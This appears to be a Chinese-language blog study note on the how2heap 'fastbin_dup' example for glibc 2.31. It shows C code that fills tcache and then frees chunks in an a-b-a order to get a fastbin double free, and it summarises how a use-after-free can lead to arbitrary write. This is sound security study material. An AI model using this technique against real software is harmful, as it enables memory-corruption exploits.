今天是四月十九，想在五月份之前把how2heap中的高版本(2.31)的例子过一遍。所以这个系列目前还是在更新中。如果比较简单就几句话带过了，遇到难一点的会写的详细一点。

fastbin_dup

源代码：

 1 #include <stdio.h>
 2 #include <stdlib.h>
 3 #include <assert.h>
 4 
 5 int main()
 6 {
 7     setbuf(stdout, NULL);
 8 
 9     printf("This file demonstrates a simple double-free attack with fastbins.\n");
10 
11     printf("Fill up tcache first.\n");
12     void *ptrs[8];
13     for (int i=0; i<8; i++) {
14         ptrs[i] = malloc(8);
15     }
16     for (int i=0; i<7; i++) {
17         free(ptrs[i]);
18     }
19 
20     printf("Allocating 3 buffers.\n");
21     int *a = calloc(1, 8);
22     int *b = calloc(1, 8);
23     int *c = calloc(1, 8);
24 
25     printf("1st calloc(1, 8): %p\n", a);
26     printf("2nd calloc(1, 8): %p\n", b);
27     printf("3rd calloc(1, 8): %p\n", c);
28 
29     printf("Freeing the first one...\n");
30     free(a);
31 
32     printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
33     // free(a);
34 
35     printf("So, instead, we'll free %p.\n", b);
36     free(b);
37 
38     printf("Now, we can free %p again, since it's not the head of the free list.\n", a);
39     free(a);
40 
41     printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
42     a = calloc(1, 8);
43     b = calloc(1, 8);
44     c = calloc(1, 8);
45     printf("1st calloc(1, 8): %p\n", a);
46     printf("2nd calloc(1, 8): %p\n", b);
47     printf("3rd calloc(1, 8): %p\n", c);
48 
49     assert(a == c);
50 }

View Code

总结：

　　1.使用calloc申请chunk，并不会从tcache中拿chunk。

　　2.如果存在uaf漏洞，可以先将tcache填充满，再利用free(a)，free(b)，free(a)的操作实现double free，实现任意写。